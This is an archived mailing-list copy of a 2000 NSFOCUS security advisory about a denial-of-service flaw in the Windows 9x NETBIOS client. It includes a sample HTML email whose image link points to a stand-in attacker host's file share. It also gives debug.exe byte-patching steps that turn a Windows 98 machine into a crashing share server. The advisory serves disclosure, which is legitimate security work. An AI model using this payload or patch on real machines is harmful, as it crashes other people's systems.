OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: NSFOCUS SA2000-04: Microsoft Win9x client driver type comparing vulnerability
From: Steve (stevemWIN2000MAG.COM)
Date: Fri Oct 13 2000 - 18:11:16 CDT

NSFOCUS Security Advisory(SA2000-04)

Topic£ºMicrosoft Win9x client driver type comparing vulnerability

Release Date£º Aug 20, 2000
Update Date£º Oct 11, 2000

Affected System:
================
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows 98 Second Edition

Non-affected system£º
===================
 - Microsoft Windows NT
 - Microsoft Windows 2000

Impact:
=========

NSFOCUS security team has found a security flaw in Microsoft Win9x NETBIOS
client.
Exploitation of this vulnerability , a malicious attacker can modify his
file share
service and perform DoS attack to a Win9x client that visits it.

Description£º
============

When Win9x client accessing NETBIOS file shared services and comparing the
driver
types, if the returned type from server is none of below:"£¿£¿£¿£¿£¿"," A£º
"," LPT1£º"
," COMM"or"IPC"£¬it will lead to the sixth result, which is fake cause there
are only
five of them. So, win9x client will get a wrong driver pointer from
conversion,
transfer the control to the wrong driver function address and finally crash.

Malicious user can send an HTML email to his target.
One sample file is like this:

<html>
<body>
hello
<img src="file:\\attacker.host\pub\a.gif">
<body>
</html>

When a win9x client read the malicious HTML email with outlook express or
other
email client with HTML support, the client will be DoS.

Exploits:
==========

You can do like this(windows 98 Secondary Edition, English version):

D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60 3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9
<.u$.......js...
1266:2B70 64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E
ds....r....v...>
1266:2B80 05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9
.s...Xw!.f..8...
1266:2B90 65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38
et...ht2..gu...8
1266:2BA0 1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9
.....8.....nt...
1266:2BB0 70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01
pt...lt...8.....
1266:2BC0 00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3
......8'....8...
1266:2BD0 91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8
..H2u..x*.t..*.
-n vserver.bak (backup)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q

reboot the machine.

Set a password for a shared directory .

Access the share directory from another win9x client.
Usually the client will get "blue screen" ,then the system will become
unstable
or halt.

Workaround:
====================

Don't access the untrusted host's file share service.
Disable NetBIOS over TCP/IP.

Solutions:
====================

Microsoft has been informed.

DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT
WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER
INCLUDING DIRECT, INDIRECT, INCIDENTAL,CONSEQUENTIAL, LOSS OF
BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR
REPRODUTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY
IS NOT MODIFIED IN ANY WAY.

(c) 1999-2000 Nsfocus. All rights reserved. Terms of use.

Nsfocus Security Team <securitynsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net